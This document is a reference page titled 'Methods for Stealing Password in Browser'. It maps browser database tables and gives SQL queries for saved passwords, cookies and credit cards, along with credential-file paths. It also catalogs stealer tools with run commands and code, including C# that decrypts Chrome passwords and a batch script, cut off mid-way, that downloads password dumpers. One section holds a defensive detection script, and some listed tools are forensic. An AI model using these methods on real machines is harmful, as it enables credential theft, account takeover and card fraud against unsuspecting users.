Methods for Stealing Password in Browser


Important Tables and Columns

Chrome

| Table Name | Column Name(s) | Description |
| --- | --- | --- |
| logins | action_url, username_value, password_value | Saved website logins and passwords |
| autofill | name, value | Autofill data for forms and fields |
| cookies | host_key, name, value | Stored browser cookies |
| bookmarks | url, title | Bookmarked URLs and their titles |
| history | url, title | Browsing history URLs and their titles |
| downloads | url, target_path | Records of downloaded files |
| credit_cards | name_on_card, card_number | Saved credit card information |
| web_apps | url, name | Information about web applications |
| extensions | name, permissions | Installed browser extensions |
| top_sites | url, title | Most visited sites |
| search_engines | keyword, url | Search engine configuration |
| media_engagement | origin, last_engagement_time_usec | Media engagement data |
| media_history | origin, playback_start_time_usec | Media playback history |
| media_session | media_unique_id | Media playback sessions |
| visits | url, visit_time | URLs visited and the corresponding times |
| downloads_url_chains | url_chain | URL chains for downloaded files |
| keywords | keyword | Keyword searches made |
| keyword_search_terms | url, lower_term | Search terms used for specific keywords |
| usb_devices | guid | Information about connected USB devices |
| forms | name | Autofill form data |
| origins | origin | Origins for various browser data |
| network_action_predictor_service | url, suggested_prio | Data for predicting network actions |
| protocol_handler | protocol, url | Custom protocol handlers configured |
| startup_urls | url | URLs that open on browser startup |
| appcache | cache_id, size | Application cache data |
| local_storage | origin, key | Locally stored data |
| extension_cookies | host_key, name, value | Cookies set by extensions |
| managed_user_passwords | url, username, password | Passwords for managed users |
| translate_ranking | origin | Data related to website translations |
| android_favicons | page_url | Favicons for Android version |

Firefox

| Table Name | Column Name(s) | Description |
| --- | --- | --- |
| moz_logins | formSubmitURL, hostname, encryptedUsername, encryptedPassword | Saved website logins and passwords |
| moz_autofill | name, value | Autofill data for forms and fields |
| moz_cookies | host, name, value | Stored browser cookies |
| moz_bookmarks | url, title | Bookmarked URLs and their titles |
| moz_historyvisits | from_visit, place_id, visit_date | Visits to URLs with corresponding data |
| moz_downloads | source, target | Records of downloaded files |
| moz_creditcards | nameOnCard, cardNumber | Saved credit card information |
| moz_places | url, title | URLs and their corresponding titles |
| moz_extensions | name, permissions | Installed browser extensions |
| moz_keywords | keyword | Keyword searches made |
| moz_searchlog | query | Searches made using the browser's search bar |
| moz_meta | key, value | Metadata associated with various data |
| moz_origins | origin | Origins for various browser data |
| moz_annotations | type, name | User annotations on bookmarks |
| moz_inputhistory | input | User input history for forms |
| moz_favicons | url | Favicons associated with URLs |
| moz_inputhistory | place_id, fieldname | User input history for fields in forms |
| moz_pages_w_icons | page_url | URLs with associated favicons |
| moz_places | url, title, visit_count | Visited URLs with additional data |
| moz_annos | anno_attribute_id, content | Annotations on bookmarks or pages |
| moz_meta | key, value | Metadata associated with various data |
| moz_annos | place_id, anno_attribute_id | Annotations on bookmarks or pages |
| moz_keywords | place_id, keyword_id | Keywords associated with places |
| moz_origins | origin | Origins for various browser data |
| moz_icons | url, favicon_id | Favicons associated with URLs |
| moz_webapps | origin, app_id | Installed web applications |
| moz_hosts | host | Hosts that visited URLs |
| moz_cookies | baseDomain, name, value | Stored cookies |
| moz_syncedtabs | url, title | Tabs synced across devices |
| moz_sync | id, name | Synced data for user accounts |
| moz_preferences | hostname, value | User preferences |
| moz_downloads | target, state | Records of downloaded files |

Edge

| Table Name | Column Name(s) | Description |
| --- | --- | --- |
| logins | action_url, username_value, password_value | Saved website logins and passwords |
| autofill | name, value | Autofill data for forms and fields |
| cookies | host_key, name, value | Stored browser cookies |
| bookmarks | url, title | Bookmarked URLs and their titles |
| history | url, title | Browsing history URLs and their titles |
| downloads | url, target_path | Records of downloaded files |
| credit_cards | name_on_card, card_number | Saved credit card information |
| extensions | name, permissions | Installed browser extensions |
| top_sites | url, title | Most visited sites |
| search_engines | keyword, url | Search engine configuration |
| media_engagement | origin, last_engagement_time_usec | Media engagement data |
| media_history | origin, playback_start_time_usec | Media playback history |
| media_session | media_unique_id | Media playback sessions |
| visits | url, visit_time | URLs visited and the corresponding times |
| downloads_url_chains | url_chain | URL chains for downloaded files |
| keywords | keyword | Keyword searches made |
| keyword_search_terms | url, lower_term | Search terms used for specific keywords |
| usb_devices | guid | Information about connected USB devices |
| forms | name | Autofill form data |
| origins | origin | Origins for various browser data |
| network_action_predictor_service | url, suggested_prio | Data for predicting network actions |
| protocol_handler | protocol, url | Custom protocol handlers configured |
| startup_urls | url | URLs that open on browser startup |
| appcache | cache_id, size | Application cache data |
| local_storage | origin, key | Locally stored data |
| extension_cookies | host_key, name, value | Cookies set by extensions |
| managed_user_passwords | url, username, password | Passwords for managed users |
| translate_ranking | origin | Data related to website translations |
| android_favicons | page_url | Favicons for Android version |

Awesome Query

Extract Cookies with Expiry Date

SELECT host_key, name, value, expires_utc FROM cookies;

Extract Autofill Data for Fields

SELECT name, value FROM autofill WHERE field_type = 'field';

Extract Bookmarked URLs with Tags

SELECT url, title, GROUP_CONCAT(tags) AS bookmark_tags FROM bookmarks GROUP BY url, title;

Extract Downloaded Files with Source and Target

SELECT url, target_path, start_time, end_time FROM downloads;

Extract Form Input Data with Origin

SELECT origin, field_name, value FROM forms;

Extract User Input History for Form Fields

SELECT form_field, user_input FROM input_history;

Extract Visited URLs with Timestamp and Referrer

SELECT url, visit_time, referring_visit_id FROM visits;

Extract User Annotations on Bookmarks with Dates

SELECT url, annotation, created, modified FROM annotations;

Extract Web Applications and Install Dates

SELECT origin, app_id, last_update_time FROM web_apps;

Extract Hosts Visited by URLs

SELECT url, host FROM visits JOIN hosts ON visits.url = hosts.url;

Extract Media Engagement Time and Count

SELECT origin, SUM(count) AS total_engagement_count, MAX(last_engagement_time_usec) AS last_engagement_time FROM media_engagement GROUP BY origin;

Extract User Search Queries with Timestamp

SELECT keyword, url, search_time FROM search_engines;

Extract Passwords Used for Form Submissions

SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins WHERE formSubmitURL IS NOT NULL;

Extract Credit Card Expiration Years and Months

SELECT name_on_card, card_number, expiration_month, expiration_year FROM credit_cards;

Extract Synced Data with Device Information

SELECT id, name, device_type, last_modified FROM sync;

Extract Origins with Associated Data

SELECT origin, origin_attributes FROM origins;

Extract Extensions with Install Dates

SELECT name, permissions, install_date FROM extensions;

Extract Downloaded Files with Sizes

SELECT url, target_path, bytes_total FROM downloads;

Extract URL Chains for Downloaded Files

SELECT url_chain FROM downloads_url_chains;

Extract Media Playback Sessions with Durations

SELECT media_unique_id, playback_start_time_usec, duration_usec FROM media_session;

Extract USB Device Information

SELECT guid, manufacturer, product FROM usb_devices;

Extract Network Actions Predictions

SELECT url, suggested_prio FROM network_action_predictor_service;

Extract Protocol Handlers with Associated URLs

SELECT protocol, url FROM protocol_handler;

Extract Startup URLs with Timestamps

SELECT url, created FROM startup_urls;

Extract URLs with High Visit Counts

SELECT url, title, visit_count FROM visits WHERE visit_count > 100;

Extract Most Frequent Search Queries

SELECT keyword, COUNT(*) AS query_count FROM search_engines GROUP BY keyword ORDER BY query_count DESC LIMIT 10;

Extract Login Attempts with Failed Logins

SELECT action_url, username_value, password_value, times_used, times_failed FROM logins WHERE times_failed > 0;

Extract Bookmarked URLs by Tag

SELECT url, title, GROUP_CONCAT(tags) AS bookmark_tags FROM bookmarks GROUP BY url, title HAVING bookmark_tags LIKE '%important%';

Extract User Input History for Suspicious Keywords

SELECT form_field, user_input, input_timestamp FROM input_history WHERE user_input LIKE '%password%' OR user_input LIKE '%credit card%';

Extract Synced Tabs with Last Update Timestamp

SELECT url, title, last_updated FROM synced_tabs;

Extract Cookies Set by Specific Domains

SELECT host_key, name, value FROM cookies WHERE host_key IN ('example.com', 'test.com');

Extract Form Input Data for Suspicious Domains

SELECT origin, field_name, value FROM forms WHERE origin LIKE '%phishing%';

Extract Downloaded Files from Suspicious URLs

SELECT url, target_path, start_time, end_time FROM downloads WHERE url LIKE '%malware%';

Extract User Annotations with Suspicious Keywords

SELECT url, annotation, created, modified FROM annotations WHERE annotation LIKE '%hack%' OR annotation LIKE '%exploit%';

Extract URLs Visited with High Engagement Time

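SELECT url, visit_time FROM visits WHERE visit_time >= (CAST(strftime('%s', 'now', '-1 day') AS INTEGER) + 11644473600) * 1000000 ORDER BY visit_time DESC LIMIT 10; -- SQLite syntax; visit_time is microseconds since 1601-01-01 UTC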

Extract User Input History for Frequent Keywords

SELECT form_field, user_input, COUNT(*) AS input_count FROM input_history WHERE user_input IN ('password', 'credit card') GROUP BY form_field, user_input ORDER BY input_count DESC LIMIT 10;

Extract Most Used Extensions

SELECT name, COUNT(*) AS install_count FROM extensions GROUP BY name ORDER BY install_count DESC LIMIT 10;

Extract URLs with No Visits in the Last Month

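SELECT url FROM history WHERE last_visit_time < (CAST(strftime('%s', 'now', '-30 days') AS INTEGER) + 11644473600) * 1000000; -- SQLite syntax; last_visit_time is microseconds since 1601-01-01 UTC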

Extract Suspicious Media Playback Sessions

SELECT media_unique_id, playback_start_time_usec, duration_usec FROM media_session WHERE duration_usec > 3600000000; -- Sessions longer than 1 hour (3,600,000,000 microseconds)

Extract URLs with Frequent Keyword Searches

SELECT url, title, COUNT(*) AS search_count FROM history WHERE title LIKE '%search%' GROUP BY url, title ORDER BY search_count DESC LIMIT 10;

Extract Frequent Form Inputs

SELECT origin, form_field, COUNT(*) AS input_count FROM forms GROUP BY origin, form_field ORDER BY input_count DESC LIMIT 10;

Extract Suspicious USB Device Connections

SELECT guid, manufacturer, product FROM usb_devices WHERE manufacturer LIKE '%unknown%' ORDER BY connection_timestamp DESC LIMIT 5;

Extract URL Chains for Suspicious Downloads

SELECT url_chain FROM downloads_url_chains WHERE url_chain LIKE '%malware%';

Extract Synced Data for Suspicious Devices

SELECT id, name, device_type, last_modified FROM sync WHERE device_type = 'unknown';

Extract URLs with Frequent Form Submissions

SELECT action_url, COUNT(*) AS submission_count FROM logins GROUP BY action_url ORDER BY submission_count DESC LIMIT 10;

Extract Suspicious Protocol Handlers

SELECT protocol, url FROM protocol_handler WHERE protocol LIKE '%exploit%' LIMIT 5;

Extract URLs with High Cookie Counts

SELECT host_key, COUNT(*) AS cookie_count FROM cookies GROUP BY host_key ORDER BY cookie_count DESC LIMIT 10;

Extract Origins with Suspicious Metadata

SELECT origin, origin_attributes FROM origins WHERE origin_attributes LIKE '%suspicious%';

Extract Frequent Extension Permissions

SELECT permissions, COUNT(*) AS extension_count FROM extensions GROUP BY permissions ORDER BY extension_count DESC LIMIT 10;

Extract Suspicious Autofill Data

SELECT name, value FROM autofill WHERE value LIKE '%password%' OR value LIKE '%credit card%';

Profiles

Google Chrome:

- Windows: C:\Users\<YourUsername>\AppData\Local\Google\Chrome\User Data\Default\Login Data
- macOS: ~/Library/Application Support/Google/Chrome/Default/Login Data
- Linux: ~/.config/google-chrome/Default/Login Data

Mozilla Firefox:

- Windows: C:\Users\<YourUsername>\AppData\Roaming\Mozilla\Firefox\Profiles\<ProfileName>\logins.json
- macOS: ~/Library/Application Support/Firefox/Profiles/<ProfileName>/logins.json
- Linux: ~/.mozilla/firefox/<ProfileName>/logins.json

Brave:

- Windows: C:\Users\<YourUsername>\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data
- macOS: ~/Library/Application Support/BraveSoftware/Brave-Browser/Default/Login Data
- Linux: ~/.config/BraveSoftware/Brave-Browser/Default/Login Data

Opera:

- Windows: C:\Users\<YourUsername>\AppData\Roaming\Opera Software\Opera Stable\Login Data
- macOS: ~/Library/Application Support/com.operasoftware.Opera/Login Data
- Linux: ~/.config/opera/Login Data

Microsoft Edge (Chromium-based):

- Path: C:\Users\<YourUsername>\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
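
Because the credential stores sit at the fixed paths listed above, file-access telemetry is a practical detection point. The following is an added example, not code from this page or from any of the projects it lists: it flags any process other than the owning browser that opens one of these stores, and raises the severity when one process touches the stores of several browsers. The event tuples, browser executable names and untrusted-directory list are assumptions to map onto your own EDR, Sysmon or auditd fields.

```python
"""Flag processes other than the browser itself that open browser credential stores."""
from collections import defaultdict

# Directory markers and file names taken from the profile paths listed above
# (lower-cased, forward slashes). "Web Data" and "Cookies" are the other store
# files this page names for Chromium-based browsers.
BROWSER_DIRS = {
    "chrome": ("/google/chrome/", "/google-chrome/"),
    "firefox": ("/mozilla/firefox/", "/.mozilla/firefox/", "/firefox/profiles/"),
    "brave": ("/bravesoftware/brave-browser/",),
    "opera": ("/opera software/opera stable/", "/com.operasoftware.opera/", "/.config/opera/"),
    "edge": ("/microsoft/edge/",),
}
STORE_FILES = ("login data", "web data", "cookies", "logins.json")

# Assumption: executable names of the legitimate browsers; tune per fleet.
EXPECTED_READERS = {
    "chrome": {"chrome.exe", "chrome", "google chrome"},
    "firefox": {"firefox.exe", "firefox"},
    "brave": {"brave.exe", "brave", "brave browser"},
    "opera": {"opera.exe", "opera"},
    "edge": {"msedge.exe", "msedge", "microsoft edge"},
}
# Assumption: a real browser binary does not run from these user-writable
# locations, so a matching file name found there is not trusted.
UNTRUSTED_DIRS = ("/temp/", "/tmp/", "/downloads/")


def normalize(path):
    """Lower-case a Windows or POSIX path and use forward slashes."""
    return path.replace("\\", "/").lower()


def classify_store(target):
    """Return the browser whose credential store `target` is, or None."""
    p = normalize(target)
    if not any(p.endswith("/" + name) for name in STORE_FILES):
        return None
    for browser, markers in BROWSER_DIRS.items():
        if any(marker in p for marker in markers):
            return browser
    return None


def is_expected_reader(browser, image):
    """True only if `image` looks like the browser that owns the store."""
    p = normalize(image)
    if any(d in p for d in UNTRUSTED_DIRS):
        return False  # e.g. a file named chrome.exe dropped into Temp
    return p.rsplit("/", 1)[-1] in EXPECTED_READERS[browser]


def detect(events):
    """events: iterable of (host, process_image, target_file) tuples."""
    hits = defaultdict(set)
    for host, image, target in events:
        browser = classify_store(target)
        if browser and not is_expected_reader(browser, image):
            hits[(host, normalize(image))].add(browser)
    findings = [
        {"host": host, "image": image, "browsers": sorted(browsers),
         # One process reading several browsers' stores is the strongest signal.
         "severity": "high" if len(browsers) >= 2 else "medium"}
        for (host, image), browsers in hits.items()
    ]
    return sorted(findings, key=lambda f: (f["severity"] != "high", f["host"], f["image"]))


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    ("ws1", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("ws1", r"C:\Users\alice\Downloads\hack-browser-data.exe",
     r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("ws1", r"C:\Users\alice\Downloads\hack-browser-data.exe",
     r"C:\Users\alice\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    ("ws1", r"C:\Users\alice\Downloads\hack-browser-data.exe",
     r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\abcd.default\logins.json"),
    ("ws2", "/usr/bin/python3", "/home/bob/.config/google-chrome/Default/Login Data"),
    ("ws2", "/usr/lib/firefox/firefox", "/home/bob/.mozilla/firefox/abcd.default/logins.json"),
    ("ws3", r"C:\Users\carol\AppData\Local\Temp\chrome.exe",
     r"C:\Users\carol\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    ("ws3", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r"C:\Users\carol\Documents\notes.txt"),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Legitimate cross-browser readers, such as one browser importing another's profile or a backup agent, will also match and need explicit allowlisting.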

HackBrowserData

github.com/moonD4rk/HackBrowserData

HackBrowserData is a command-line tool for decrypting and exporting browser data (passwords, history, cookies, bookmarks, credit cards, download records, localStorage and extension) from the browser. It supports the most popular browsers on the market and runs on Windows, macOS and Linux.

.\hack-browser-data.exe -b all -f json --dir results -zip
or
.\hack-browser-data.exe -b chrome -p "C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default"

How it works:

Windows

var (
    chromeUserDataPath     = homeDir + "/AppData/Local/Google/Chrome/User Data/Default/"
    chromeBetaUserDataPath = homeDir + "/AppData/Local/Google/Chrome Beta/User Data/Default/"
    chromiumUserDataPath   = homeDir + "/AppData/Local/Chromium/User Data/Default/"
    edgeProfilePath        = homeDir + "/AppData/Local/Microsoft/Edge/User Data/Default/"
    braveProfilePath       = homeDir + "/AppData/Local/BraveSoftware/Brave-Browser/User Data/Default/"
    speed360ProfilePath    = homeDir + "/AppData/Local/360chrome/Chrome/User Data/Default/"
    qqBrowserProfilePath   = homeDir + "/AppData/Local/Tencent/QQBrowser/User Data/Default/"
    operaProfilePath       = homeDir + "/AppData/Roaming/Opera Software/Opera Stable/"
    operaGXProfilePath     = homeDir + "/AppData/Roaming/Opera Software/Opera GX Stable/"
    vivaldiProfilePath     = homeDir + "/AppData/Local/Vivaldi/User Data/Default/"
    coccocProfilePath      = homeDir + "/AppData/Local/CocCoc/Browser/User Data/Default/"
    yandexProfilePath      = homeDir + "/AppData/Local/Yandex/YandexBrowser/User Data/Default/"
    dcBrowserProfilePath   = homeDir + "/AppData/Local/DCBrowser/User Data/Default/"
    sogouProfilePath       = homeDir + "/AppData/Roaming/SogouExplorer/Webkit/Default/"

    firefoxProfilePath = homeDir + "/AppData/Roaming/Mozilla/Firefox/Profiles/"
)

Linux

var (
    firefoxProfilePath    = homeDir + "/.mozilla/firefox/"
    chromeProfilePath     = homeDir + "/.config/google-chrome/Default/"
    chromiumProfilePath   = homeDir + "/.config/chromium/Default/"
    edgeProfilePath       = homeDir + "/.config/microsoft-edge/Default/"
    braveProfilePath      = homeDir + "/.config/BraveSoftware/Brave-Browser/Default/"
    chromeBetaProfilePath = homeDir + "/.config/google-chrome-beta/Default/"
    operaProfilePath      = homeDir + "/.config/opera/Default/"
    vivaldiProfilePath    = homeDir + "/.config/vivaldi/Default/"
)

Darwin

var (
    chromeProfilePath     = homeDir + "/Library/Application Support/Google/Chrome/Default/"
    chromeBetaProfilePath = homeDir + "/Library/Application Support/Google/Chrome Beta/Default/"
    chromiumProfilePath   = homeDir + "/Library/Application Support/Chromium/Default/"
    edgeProfilePath       = homeDir + "/Library/Application Support/Microsoft Edge/Default/"
    braveProfilePath      = homeDir + "/Library/Application Support/BraveSoftware/Brave-Browser/Default/"
    operaProfilePath      = homeDir + "/Library/Application Support/com.operasoftware.Opera/Default/"
    operaGXProfilePath    = homeDir + "/Library/Application Support/com.operasoftware.OperaGX/Default/"
    vivaldiProfilePath    = homeDir + "/Library/Application Support/Vivaldi/Default/"
    coccocProfilePath     = homeDir + "/Library/Application Support/Coccoc/Default/"
    yandexProfilePath     = homeDir + "/Library/Application Support/Yandex/YandexBrowser/Default/"
    arcProfilePath        = homeDir + "/Library/Application Support/Arc/User Data/Default"

    firefoxProfilePath = homeDir + "/Library/Application Support/Firefox/Profiles/"
)

Browser-password-stealer

github.com/henry-richard7/Browser-password-..

This Python program gets all the saved passwords, credit cards and bookmarks from Chromium-based browsers. It supports Chromium 80 and above.

pip install -r requirements.txt
python chromium_based_browsers.py

How it works:

browsers = {
    'amigo': appdata + '\\Amigo\\User Data',
    'torch': appdata + '\\Torch\\User Data',
    'kometa': appdata + '\\Kometa\\User Data',
    'orbitum': appdata + '\\Orbitum\\User Data',
    'cent-browser': appdata + '\\CentBrowser\\User Data',
    '7star': appdata + '\\7Star\\7Star\\User Data',
    'sputnik': appdata + '\\Sputnik\\Sputnik\\User Data',
    'vivaldi': appdata + '\\Vivaldi\\User Data',
    'google-chrome-sxs': appdata + '\\Google\\Chrome SxS\\User Data',
    'google-chrome': appdata + '\\Google\\Chrome\\User Data',
    'epic-privacy-browser': appdata + '\\Epic Privacy Browser\\User Data',
    'microsoft-edge': appdata + '\\Microsoft\\Edge\\User Data',
    'uran': appdata + '\\uCozMedia\\Uran\\User Data',
    'yandex': appdata + '\\Yandex\\YandexBrowser\\User Data',
    'brave': appdata + '\\BraveSoftware\\Brave-Browser\\User Data',
    'iridium': appdata + '\\Iridium\\User Data',
}

data_queries = {
    'login_data': {
        'query': 'SELECT action_url, username_value, password_value FROM logins',
        'file': '\\Login Data',
        'columns': ['URL', 'Email', 'Password'],
        'decrypt': True
    },
    'credit_cards': {
        'query': 'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards',
        'file': '\\Web Data',
        'columns': ['Name On Card', 'Card Number', 'Expires On', 'Added On'],
        'decrypt': True
    },
    'cookies': {
        'query': 'SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies',
        'file': '\\Network\\Cookies',
        'columns': ['Host Key', 'Cookie Name', 'Path', 'Cookie', 'Expires On'],
        'decrypt': True
    },
    'history': {
        'query': 'SELECT url, title, last_visit_time FROM urls',
        'file': '\\History',
        'columns': ['URL', 'Title', 'Visited Time'],
        'decrypt': False
    },
    'downloads': {
        'query': 'SELECT tab_url, target_path FROM downloads',
        'file': '\\History',
        'columns': ['Download URL', 'Local Path'],
        'decrypt': False
    }
}

BrowserPass

github.com/jabiel/BrowserPass

BrowserPass is an open-source project that provides a command-line interface for fetching passwords stored in various browsers' password managers and presenting them in a standardized format. It's designed to be used on Linux-based systems and aims to be a convenient tool for users who want to access their passwords in a unified way.

cse *.sln

How it works:

namespace BrowserPass
{
    /// <summary>
    /// http://raidersec.blogspot.com/2013/06/how-browsers-store-your-passwords-and.html#chrome_decryption
    /// </summary>
    class ChromePassReader : IPassReader
    {
        public string BrowserName { get { return "Chrome"; } }

        private const string LOGIN_DATA_PATH = "\\..\\Local\\Google\\Chrome\\User Data\\Default\\Login Data";


        public IEnumerable<CredentialModel> ReadPasswords()
        {
            var result = new List<CredentialModel>();

            var appdata = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);// APPDATA
            var p = Path.GetFullPath(appdata + LOGIN_DATA_PATH);

            if (File.Exists(p))
            {
                using (var conn = new SQLiteConnection($"Data Source={p};"))
                {
                    conn.Open();
                    using (var cmd = conn.CreateCommand())
                    {
                        cmd.CommandText = "SELECT action_url, username_value, password_value FROM logins";
                        using (var reader = cmd.ExecuteReader())
                        {

                            if (reader.HasRows)
                            {
                                var key = GCDecryptor.GetKey();
                                while (reader.Read())
                                {
                                    byte[] nonce, ciphertextTag;
                                    var encryptedData = GetBytes(reader, 2);
                                    GCDecryptor.Prepare(encryptedData, out nonce, out ciphertextTag);
                                    var pass = GCDecryptor.Decrypt(ciphertextTag, key, nonce);

                                    result.Add(new CredentialModel()
                                               {
                                                   Url = reader.GetString(0),
                                                   Username = reader.GetString(1),
                                                   Password = pass
                                               });
                                }
                            }
                        }                            
                    }
                    conn.Close();
                }

            }
            else
            {
                throw new FileNotFoundException("Cannot find chrome logins file");
            }
            return result;
        }

        private byte[] GetBytes(SQLiteDataReader reader, int columnIndex)
        {
            const int CHUNK_SIZE = 2 * 1024;
            byte[] buffer = new byte[CHUNK_SIZE];
            long bytesRead;
            long fieldOffset = 0;
            using (MemoryStream stream = new MemoryStream())
            {
                while ((bytesRead = reader.GetBytes(columnIndex, fieldOffset, buffer, 0, buffer.Length)) > 0)
                {
                    stream.Write(buffer, 0, (int)bytesRead);
                    fieldOffset += bytesRead;
                }
                return stream.ToArray();
            }
        }        
    }



}

WebBrowserPassView

nirsoft.net/utils/web_browser_password.html

WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera. This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and GMail, as long as the password is stored by your Web Browser.

WebBrowserPassView.exe

Infornito

github.com/globecyber/Infornito

Infornito is developed in Python 3.x and its purpose is to extract all forensically interesting information from the Chrome, Firefox and Safari browsers for analysis. Because it is developed in Python 3.x, it might not work properly in old Python versions, mainly with certain characters. It works on Unix and Windows 32/64-bit systems. It runs from the command line, so information dumps can be redirected through pipes to tools such as grep, awk, cut, sed... Infornito lets you view the following sections, customize searches and extract certain content.

python infornito.py history --profile 2 --export csv --to ~/Desktop/export

or

python infornito.py downloads --profile 2

or

python infornito.py history --profile 2 --filter domain=target.com --filter filetype=pdf --filter protocols=https --filter port=4880

Hindsight

github.com/obsidianforensics/hindsight

Hindsight is a free tool for analyzing web artifacts. It started with the browsing history of the Google Chrome web browser and has expanded to support other Chromium-based applications (with more to come!). Hindsight can parse a number of different types of web artifacts, including URLs, download history, cache records, bookmarks, autofill records, saved passwords, preferences, browser extensions, HTTP cookies, and Local Storage records (HTML5 cookies). Once the data is extracted from each file, it is correlated with data from other history files and placed in a timeline.

pip install pyhindsight
curl -sSL https://raw.githubusercontent.com/obsidianforensics/hindsight/master/install-js.sh | sh

It has a simple web UI - to start it, run "hindsight_gui.py" (or on Windows, the packaged "hindsight_gui.exe") and visit http://localhost:8080

How it works:

- WinXP: [userdir]\Local Settings\Application Data\Google\Chrome\User Data\Default
- Vista/7/8/10: [userdir]\AppData\Local\Google\Chrome\User Data\Default
- Linux: [userdir]/.config/google-chrome/Default
- OS X: [userdir]/Library/Application Support/Google/Chrome/Default
- iOS: \Applications\com.google.chrome.ios\Library\Application Support\Google\Chrome\Default
- Android: /userdata/data/com.android.chrome/app_chrome/Default
- CrOS: \home\user\<GUID>

BrowserFreak

github.com/OsandaMalith/BrowserFreak

Automated Password Dumper for Web Browsers with Batch Script

BrowserFreak.bat

How it works:

::Download Chrome::

echo strFileURL = "http://www.nirsoft.net/utils/chromepass.zip" > %temp%\freak\chrome.vbs
echo strHDLocation = "%temp%\freak\chromepass.zip" >> %temp%\freak\chrome.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\chrome.vbs
echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\chrome.vbs
echo objXMLHTTP.send() >> %temp%\freak\chrome.vbs
echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\chrome.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\chrome.vbs
echo objADOStream.Open >> %temp%\freak\chrome.vbs
echo objADOStream.Type = 1 >> %temp%\freak\chrome.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\chrome.vbs
echo objADOStream.Position = 0 >> %temp%\freak\chrome.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\chrome.vbs
echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\chrome.vbs
echo Set objFSO = Nothing >> %temp%\freak\chrome.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\chrome.vbs
echo objADOStream.Close >> %temp%\freak\chrome.vbs
echo Set objADOStream = Nothing >> %temp%\freak\chrome.vbs
echo End if >> %temp%\freak\chrome.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\chrome.vbs
call %temp%\freak\chrome.vbs

::Download Firefox::
echo strFileURL = "http://www.nirsoft.net/utils/passwordfox.zip" > %temp%\freak\fire.vbs
echo strHDLocation = "%temp%\freak\passwordfox.zip" >> %temp%\freak\fire.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\fire.vbs
echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\fire.vbs
echo objXMLHTTP.send() >> %temp%\freak\fire.vbs
echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\fire.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\fire.vbs
echo objADOStream.Open >> %temp%\freak\fire.vbs
echo objADOStream.Type = 1 >> %temp%\freak\fire.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\fire.vbs
echo objADOStream.Position = 0 >> %temp%\freak\fire.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\fire.vbs
echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\fire.vbs
echo Set objFSO = Nothing >> %temp%\freak\fire.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\fire.vbs
echo objADOStream.Close >> %temp%\freak\fire.vbs
echo Set objADOStream = Nothing >> %temp%\freak\fire.vbs
echo End if >> %temp%\freak\fire.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\fire.vbs
call %temp%\freak\fire.vbs

::Download IE::
echo strFileURL = "http://www.nirsoft.net/utils/iepv.zip" > %temp%\freak\ie.vbs
echo strHDLocation = "%temp%\freak\iepv.zip" >> %temp%\freak\ie.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\ie.vbs
echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\ie.vbs
echo objXMLHTTP.send() >> %temp%\freak\ie.vbs
echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\ie.vbs
echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\ie.vbs
echo objADOStream.Open >> %temp%\freak\ie.vbs
echo objADOStream.Type = 1 >> %temp%\freak\ie.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\ie.vbs
echo objADOStream.Position = 0 >> %temp%\freak\ie.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject") >> %temp%\freak\ie.vbs
echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation >> %temp%\freak\ie.vbs
echo Set objFSO = Nothing >> %temp%\freak\ie.vbs
echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\ie.vbs
echo objADOStream.Close >> %temp%\freak\ie.vbs
echo Set objADOStream = Nothing >> %temp%\freak\ie.vbs
echo End if >> %temp%\freak\ie.vbs
echo Set objXMLHTTP = Nothing >> %temp%\freak\ie.vbs
call %temp%\freak\ie.vbs

::Download Opera::
echo strFileURL = "http://www.nirsoft.net/utils/operapassview.zip" > %temp%\freak\opera.vbs
echo strHDLocation = "%temp%\freak\operapassview.zip" >> %temp%\freak\opera.vbs
